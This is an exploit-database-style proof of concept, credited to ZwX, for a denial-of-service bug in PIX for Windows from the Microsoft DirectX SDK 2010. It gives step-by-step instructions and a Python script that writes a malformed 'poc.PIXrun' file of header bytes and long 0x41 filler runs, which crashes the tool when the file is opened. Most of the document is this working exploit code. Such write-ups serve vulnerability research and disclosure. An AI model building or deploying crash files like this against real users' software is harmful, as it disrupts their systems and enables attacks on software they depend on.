#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
#Exploit Author : ZwX
#Exploit Date: 2019-11-26
#Vendor Homepage : https://www.microsoft.com/
#Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
#Tested on OS: Windows 7

Proof of Concept (PoC):
=======================

1. Download and install Microsoft DirectX SDK
2. Open the PIX for Windows tool
3. Run the python script below, which creates a file (poc.PIXrun)
4. In the software: "File -> Open File -> Add the file (.PIXrun)"
5. PIX for Windows crashes

#!/usr/bin/python

# Payload: fixed header bytes followed by long runs of 0x41 filler. Bytes literals
# and binary mode keep the values above 0x7F intact on Python 2 and 3 alike.
DoS=(b"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
b"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
b"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
b"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
b"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

poc = DoS
with open("poc.PIXrun", "wb") as f:
    f.write(poc)

print("POC Created by ZwX")
